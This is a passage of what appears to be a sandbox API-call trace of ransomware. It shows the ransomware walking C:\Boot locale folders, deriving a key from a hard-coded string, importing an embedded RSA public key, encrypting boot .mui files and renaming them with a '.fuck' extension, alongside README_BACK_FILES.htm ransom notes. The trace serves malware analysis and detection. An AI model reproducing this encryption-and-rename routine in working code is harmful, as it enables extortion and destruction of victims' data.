(lpFileName="C:\\\\Boot\\nl-NL\\README_BACK_FILES.htm" (normalized: "c:\\boot\\nl-nl\\readme_back_files.htm")) returned 0x20 [0231.632] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.632] FindFirstFileA (in: lpFileName="C:\\\\Boot\\pl-PL\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716de8 [0231.633] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.633] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.633] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.633] GetLastError () returned 0x12 [0231.633] GetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui")) returned 0x20 [0231.633] SetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.634] CreateFileA (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.634] CreateFileA (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.634] SetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.634] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781660) returned 1 [0231.636] CryptCreateHash (in: hProv=0x2781660, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.636] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.636] CryptHashData (hHash=0x2716b68, pbData=0x2ec760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.636] CryptDeriveKey (in: hProv=0x2781660, Algid=0x6610, hBaseData=0x2716b68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716f28) returned 1 [0231.636] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.637] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.637] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x27816e8) returned 1 [0231.637] CryptImportPublicKeyInfo (in: hCryptProv=0x27816e8, dwCertEncodingType=0x1, pInfo=0x277cea0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277ced0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277ced8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716ee8) returned 1 [0231.637] CryptEncrypt (in: hKey=0x2716ee8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.637] CryptEncrypt (in: hKey=0x2716ee8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2781000*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2781000*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.637] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2781000, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.637] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2717780, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.637] CryptEncrypt (in: hKey=0x2716f28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.637] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.637] CloseHandle (hObject=0xffffffff) returned 1 [0231.637] CloseHandle (hObject=0xffffffff) returned 1 [0231.637] CopyFileA (lpExistingFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.638] SetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.638] DeleteFileA (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.gsg")) returned 0 [0231.638] MoveFileA (lpExistingFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.fuck")) returned 0 [0231.638] CryptDestroyHash (hHash=0x2716b68) returned 1 [0231.638] CryptDestroyKey (hKey=0x2716f28) returned 1 [0231.638] CryptReleaseContext (hProv=0x2781660, dwFlags=0x0) returned 1 [0231.638] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.638] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.638] GetLastError () returned 0x5 [0231.639] GetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui")) returned 0x20 [0231.639] SetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.639] CreateFileA (lpFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.639] CreateFileA (lpFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.639] SetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.639] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781440) returned 1 [0231.641] CryptCreateHash (in: hProv=0x2781440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.641] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.641] CryptHashData (hHash=0x27169e8, pbData=0x2ec800, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.641] CryptDeriveKey (in: hProv=0x2781440, Algid=0x6610, hBaseData=0x27169e8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716f28) returned 1 [0231.641] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.641] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.641] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2781908) returned 1 [0231.642] CryptImportPublicKeyInfo (in: hCryptProv=0x2781908, dwCertEncodingType=0x1, pInfo=0x277cf70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277cfa0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277cfa8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x27168a8) returned 1 [0231.642] CryptEncrypt (in: hKey=0x27168a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.642] CryptEncrypt (in: hKey=0x27168a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2780ef0*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2780ef0*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.642] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2780ef0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.642] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2717780, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.642] CryptEncrypt (in: hKey=0x2716f28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.642] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.642] CloseHandle (hObject=0xffffffff) returned 1 [0231.642] CloseHandle (hObject=0xffffffff) returned 1 [0231.642] CopyFileA (lpExistingFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.643] SetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.643] DeleteFileA (lpFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui.gsg")) returned 0 [0231.643] MoveFileA (lpExistingFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui.fuck")) returned 0 [0231.643] CryptDestroyHash (hHash=0x27169e8) returned 1 [0231.643] CryptDestroyKey (hKey=0x2716f28) returned 1 [0231.643] CryptReleaseContext (hProv=0x2781440, dwFlags=0x0) returned 1 [0231.643] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.643] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.643] FindClose (in: hFindFile=0x2716de8 | out: hFindFile=0x2716de8) returned 1 [0231.644] GetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\README_BACK_FILES.htm" (normalized: "c:\\boot\\pl-pl\\readme_back_files.htm")) returned 0x20 [0231.644] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.644] FindFirstFileA (in: lpFileName="C:\\\\Boot\\pt-BR\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716de8 [0231.646] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.646] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.646] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.646] GetLastError () returned 0x12 [0231.646] GetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui")) returned 0x20 [0231.646] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.646] CreateFileA (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.646] CreateFileA (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.646] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.647] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781770) returned 1 [0231.649] CryptCreateHash (in: hProv=0x2781770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.649] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.649] CryptHashData (hHash=0x2716be8, pbData=0x2ec800, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.649] CryptDeriveKey (in: hProv=0x2781770, Algid=0x6610, hBaseData=0x2716be8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716f68) returned 1 [0231.649] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.649] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.649] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2780f78) returned 1 [0231.650] CryptImportPublicKeyInfo (in: hCryptProv=0x2780f78, dwCertEncodingType=0x1, pInfo=0x277d2b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277d2e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277d2e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716f28) returned 1 [0231.650] CryptEncrypt (in: hKey=0x2716f28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.650] CryptEncrypt (in: hKey=0x2716f28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2781880*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2781880*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.650] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2781880, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.650] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2717780, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.650] CryptEncrypt (in: hKey=0x2716f68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.650] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.650] CloseHandle (hObject=0xffffffff) returned 1 [0231.650] CloseHandle (hObject=0xffffffff) returned 1 [0231.650] CopyFileA (lpExistingFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.650] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.651] DeleteFileA (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.gsg")) returned 0 [0231.651] MoveFileA (lpExistingFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.fuck")) returned 0 [0231.651] CryptDestroyHash (hHash=0x2716be8) returned 1 [0231.651] CryptDestroyKey (hKey=0x2716f68) returned 1 [0231.651] CryptReleaseContext (hProv=0x2781770, dwFlags=0x0) returned 1 [0231.651] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.651] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.651] GetLastError () returned 0x5 [0231.651] GetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui")) returned 0x20 [0231.652] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.652] CreateFileA (lpFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.652] CreateFileA (lpFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.652] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.652] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781770) returned 1 [0231.654] CryptCreateHash (in: hProv=0x2781770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.654] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.654] CryptHashData (hHash=0x2716f68, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.654] CryptDeriveKey (in: hProv=0x2781770, Algid=0x6610, hBaseData=0x2716f68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716b28) returned 1 [0231.654] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.654] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.654] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2781a18) returned 1 [0231.655] CryptImportPublicKeyInfo (in: hCryptProv=0x2781a18, dwCertEncodingType=0x1, pInfo=0x277be60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277be90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277be98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x27168e8) returned 1 [0231.655] CryptEncrypt (in: hKey=0x27168e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.655] CryptEncrypt (in: hKey=0x27168e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2781aa0*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2781aa0*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.655] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2781aa0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.655] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2788b28, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2788b28, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.655] CryptEncrypt (in: hKey=0x2716b28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2788b28*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2788b28*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.655] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2788b28, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.655] CloseHandle (hObject=0xffffffff) returned 1 [0231.655] CloseHandle (hObject=0xffffffff) returned 1 [0231.655] CopyFileA (lpExistingFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.655] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.655] DeleteFileA (lpFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui.gsg")) returned 0 [0231.656] MoveFileA (lpExistingFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui.fuck")) returned 0 [0231.656] CryptDestroyHash (hHash=0x2716f68) returned 1 [0231.656] CryptDestroyKey (hKey=0x2716b28) returned 1 [0231.656] CryptReleaseContext (hProv=0x2781770, 